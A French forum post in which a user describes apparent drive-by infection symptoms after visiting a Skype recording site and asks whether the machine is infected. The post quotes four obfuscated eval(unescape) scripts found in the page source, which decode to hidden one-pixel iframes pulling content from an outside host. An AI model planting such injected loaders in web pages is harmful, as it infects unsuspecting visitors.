Bonjour,
Je surfais innocemment sur /!\ http://www.skyperec.com/[/url] /!\ (attention, je poste car j’ai eu un problème !), venant du site officiel de [url=http://www.clubic.com/telecharger-fiche11171-skype.html]skype.com partie extras pour trouver un programme pour enregistrer des conversations Skype.
Mais en allant sur ce site, je vois le disque gratté à fond, la mémoire virtuelle monté d’un coup à plus de 500 Mo pour firefox.exe (version 2.0) et tout se figer. Une fenêtre apparait me demandant si je voulais bien enregistrer un .wmf chez moi et tout se fige.
Je kill le process de Windows XP et je recommence.
Une alerte de sécurité Windows me prévient que mon pare feu windows SP2 est désactivé. Je me dis, c’est pas normal !
Alors je regarde le code du site et voilà ce qu’il y a en bas :
</TABLE>
</BODY>
</HTML>
<script>eval(unescape('%64%6f%63%75%6d%65%6e%74%2e%77%72%69%74%65%28%27%3c%69%66%72%61%6d%65%20%73%72%63%3d%68%74%74%70%3a%2f%2f%77%73%66%67%66%64%67%72%74%79%68%67%66%64%2e%6e%65%74%2f%61%64%76%2f%6e%65%77%2e%70%68%70%3f%61%64%76%3d%35%34%20%77%69%64%74%68%3d%31%20%68%65%69%67%68%74%3d%31%3e%3c%2f%69%66%72%61%6d%65%3e%27%29%3b'));</script><script>eval(unescape('%64%6f%63%75%6d%65%6e%74%2e%77%72%69%74%65%28%27%3c%69%66%72%61%6d%65%20%73%72%63%3d%68%74%74%70%3a%2f%2f%77%73%66%67%66%64%67%72%74%79%68%67%66%64%2e%6e%65%74%2f%61%64%76%2f%30%35%34%2f%6e%65%77%33%2e%70%68%70%20%77%69%64%74%68%3d%31%20%68%65%69%67%68%74%3d%31%3e%3c%2f%69%66%72%61%6d%65%3e%27%29%3b'));</script><script>eval(unescape('%64%6f%63%75%6d%65%6e%74%2e%77%72%69%74%65%28%27%3c%69%66%72%61%6d%65%20%73%72%63%3d%68%74%74%70%3a%2f%2f%77%73%66%67%66%64%67%72%74%79%68%67%66%64%2e%6e%65%74%2f%61%64%76%2f%6e%65%77%2e%70%68%70%3f%61%64%76%3d%35%34%20%77%69%64%74%68%3d%31%20%68%65%69%67%68%74%3d%31%3e%3c%2f%69%66%72%61%6d%65%3e%27%29%3b'));</script><script>eval(unescape('%64%6f%63%75%6d%65%6e%74%2e%77%72%69%74%65%28%27%3c%69%66%72%61%6d%65%20%73%72%63%3d%68%74%74%70%3a%2f%2f%77%73%66%67%66%64%67%72%74%79%68%67%66%64%2e%6e%65%74%2f%61%64%76%2f%30%35%34%2f%6e%65%77%33%2e%70%68%70%20%77%69%64%74%68%3d%31%20%68%65%69%67%68%74%3d%31%3e%3c%2f%69%66%72%61%6d%65%3e%27%29%3b'));</script>
Qu’est-ce que c’est que ce double eval(unescape( ?
Ai-je été infecté par un truc ?
Je précise que je suis sous Wifi, ce qui n’est pas si facile à déconnecter en cas de soucis.